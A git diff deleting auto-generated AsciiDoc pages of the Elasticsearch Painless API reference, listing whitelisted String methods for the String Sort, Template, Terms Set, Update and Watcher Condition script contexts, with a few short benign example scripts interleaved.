- diff --git a/docs/painless/painless-api-reference/painless-api-reference-string-sort/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-string-sort/packages.asciidoc deleted file mode 100644 index af4f941bedd..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-string-sort/packages.asciidoc +++ /dev/null @@ -1,91 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-string-sort-java-lang"] -=== String Sort API for package java.lang -See the <> for a high-level overview of all packages and classes. 
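The String Sort context backs script-based sorting that returns a string per document, typically built with the String augmentations listed below (for example `splitOnToken`). A hedged sketch; the keyword field `hostname` is assumed for illustration.

[source,painless]
----
// Hedged sketch of a string sort script body: assumes a keyword field
// named `hostname`; sorts documents by the host's top-level domain.
String host = doc['hostname'].value;
String[] parts = host.splitOnToken(".");
return parts.length > 0 ? parts[parts.length - 1] : host;
----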
- -[[painless-api-reference-string-sort-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean 
{java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - -[role="exclude",id="painless-api-reference-string-sort-org-elasticsearch-xpack-sql-expression-literal-geo"] -=== String Sort API for package org.elasticsearch.xpack.sql.expression.literal.geo -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-string-sort-GeoShape]] -==== GeoShape -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-string-sort-org-elasticsearch-xpack-sql-expression-literal-interval"] -=== String Sort API for package org.elasticsearch.xpack.sql.expression.literal.interval -See the <> for a high-level overview of all packages and classes. 
- -[[painless-api-reference-string-sort-IntervalDayTime]] -==== IntervalDayTime -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-string-sort-IntervalYearMonth]] -==== IntervalYearMonth -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-template/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-template/index.asciidoc deleted file mode 100644 index b53ce4bfea8..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-template/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-template]] -=== Template API - -The following specialized API is available in the Template context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-template/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-template/packages.asciidoc deleted file mode 100644 index 4581bab8450..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-template/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-template-java-lang"] -=== Template API for package java.lang -See the <> for a high-level overview of all packages and classes. 
- -[[painless-api-reference-template-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean 
{java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-terms-set/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-terms-set/index.asciidoc deleted file mode 100644 index 3ed5661d910..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-terms-set/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-terms-set]] -=== Terms Set API - -The following specialized API is available in the Terms Set context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-terms-set/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-terms-set/packages.asciidoc deleted file mode 100644 index 65c8db7af8c..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-terms-set/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-terms-set-java-lang"] -=== Terms Set API for package java.lang -See the <> for a high-level overview of all packages and classes. 
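The Terms Set context backs the `terms_set` query's `minimum_should_match_script`; besides the whitelist below, the script receives `params.num_terms` (the number of terms supplied in the query) and doc values. A hedged sketch, assuming a numeric field named `required_matches`:

[source,painless]
----
// Hedged sketch of a minimum_should_match_script body for a terms_set
// query: never require more matches than terms were provided.
return Math.min(params.num_terms, doc['required_matches'].value);
----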
- -[[painless-api-reference-terms-set-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean 
{java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-update/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-update/index.asciidoc deleted file mode 100644 index 139ab5d4984..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-update/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-update]] -=== Update API - -The following specialized API is available in the Update context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-update/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-update/packages.asciidoc deleted file mode 100644 index fa4874dc262..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-update/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-update-java-lang"] -=== Update API for package java.lang -See the <> for a high-level overview of all packages and classes. 
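The Update context is used by the update and update-by-query APIs; besides the whitelist below, the script manipulates the document through `ctx._source` and reads user-supplied values from `params`. A hedged sketch; the `tags` field and `tag` parameter are made up for illustration.

[source,painless]
----
// Hedged sketch of an update script body: appends params.tag to the
// document's `tags` list, creating the list if it does not exist yet.
if (ctx._source.tags == null) {
  ctx._source.tags = [];
}
if (!ctx._source.tags.contains(params.tag)) {
  ctx._source.tags.add(params.tag);
}
----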
- -[[painless-api-reference-update-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean 
{java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-watcher-condition/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-watcher-condition/index.asciidoc deleted file mode 100644 index ab62b04bb9d..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-watcher-condition/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-watcher-condition]] -=== Watcher Condition API - -The following specialized API is available in the Watcher Condition context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-watcher-condition/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-watcher-condition/packages.asciidoc deleted file mode 100644 index 91df00b419f..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-watcher-condition/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-watcher-condition-java-lang"] -=== Watcher Condition API for package java.lang -See the <> for a high-level overview of all packages and classes. 
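Watcher Condition scripts must return a boolean and inspect the watch execution state through `ctx`, most commonly the search result under `ctx.payload`. A hedged sketch; the `threshold` parameter is an assumed user-supplied value.

[source,painless]
----
// Hedged sketch of a watcher condition script: fire only when the search
// input returned more hits than the configured threshold.
return ctx.payload.hits.total > params.threshold;
----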
- -[[painless-api-reference-watcher-condition-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean 
